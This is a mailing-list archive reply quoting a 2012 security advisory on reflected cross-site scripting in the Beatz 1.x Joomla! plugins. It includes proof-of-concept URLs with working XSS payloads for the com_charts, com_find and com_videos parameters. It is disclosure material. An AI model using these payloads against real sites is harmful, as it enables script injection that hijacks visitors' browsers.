Full Disclosure mailing list archives
Re: Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities
From: David3 Gonnella <netevil () hackers it>
Date: Mon, 16 Apr 2012 10:39:22 +0200
poc on localhost is a bit unreachable... fbvfdjkh3ruifwqebdf On 04/15/12 18:39, YGN Ethical Hacker Group wrote:
1. OVERVIEW Beatz 1.x versions are vulnerable to Cross Site Scripting. 2. BACKGROUND Beatz is a set of powerful Social Networking Script Joomla! 1.5 plugins that allows you to start your own favourite artist band website. Although it is just a Joomla! plugin, it comes with full Joolma! bundle for ease of use and installation. 3. VULNERABILITY DESCRIPTION Multiple parameters were not properly sanitized upon submission, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser. The vulnerable plugins include: com_find, com_charts and com_videos. 4. VERSIONS AFFECTED Tested in 1.x versions 5. PROOF-OF-CONCEPT/EXPLOIT == Generic Joomla! 1.5 Double Encoding XSS http://localhost/beatz/?option=com_content&view=frontpage&limitstart=5&%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2f%2558%2553%2553%2f%2529%253c%2f%2573%2563%2572%2569%2570%2574%253e=1 == com_charts (parameter: do) http://localhost/beatz/index.php?option=com_charts&view=charts&Itemid=76&chartkeyword=Acoustic&do=all%22%20style%3dbackground-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;"%20x=%22&option=com_charts == com_find (parameter: keyword) http://localhost/beatz/index.php?do=listAll&keyword=++Search"><img+src=0+onerror=prompt(/XSS/)>&option=com_find == com_videos (parameter: video_keyword) http://localhost/beatz/index.php?option=com_videos&view=videos&Itemid=59&video_keyword="+style="width:1000px;height:1000px;position:absolute;left:0;top:0"+onmouseover="alert(/xss/)&search=Search 6. SOLUTION The vendor hasn't released the fixed yet. 7. VENDOR Cogzidel Technologies Pvt Ltd. http://www.cogzidel.com/ 8. CREDIT Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar. 9. DISCLOSURE TIME-LINE 2011-03-01: notified vendor 2012-04-15: vulnerability disclosed 10. REFERENCES Original Advisory URL: http://yehg.net/lab/pr0js/advisories/%5Bbeatz_1.x%5D_xss #yehg [2012-04-15] _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Attachment:
0xB95E8B49.asc
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities YGN Ethical Hacker Group (Apr 16)
- Re: Joomla! Plugin - Beatz 1.x <= Multiple Cross Site Scripting Vulnerabilities David3 Gonnella (Apr 16)